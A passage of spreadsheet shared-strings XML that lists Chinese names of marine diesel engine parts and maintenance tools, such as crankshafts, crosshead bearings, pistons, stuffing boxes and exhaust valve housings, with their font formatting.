    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀座环安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备用零件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀衬套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸顶盖机架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减振器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>参见补充项目表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对中工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平衡块毛坯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴粗加工</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴零件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴毛坯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴固态锻造</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄销轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄销轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄销轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轮轴销衬垫</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头轴承座</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆衬套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防尘十字头轴承盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函弹簧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接长螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起吊十字头盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扳手支撑物</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖，十字头盖槽</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拆卸螺杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头端</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头橡胶盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄销轴承白合金</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫片</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄销轴瓦</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>粗加工</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄销轴瓦</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>毛坯</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆下垫片</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮油环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑块轴颈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆导环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头铭牌</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量填料函</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>提升工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工作台夹钳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固紧量规</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头端</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架对应联接端</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部活塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却油喷嘴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞头毛坯上端</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞头毛坯下端</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分配油环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>提升工具支撑物</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞吊装工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉伸工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环槽</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞对中电子单元</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞销总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞再加工</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞冷却测试</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伸缩套管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀壳</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上端</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀壳</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>热管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀壳</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>适配器垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧推力块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀杆模板测量</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>毛坯</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间模板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不带叉形杆的侧板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
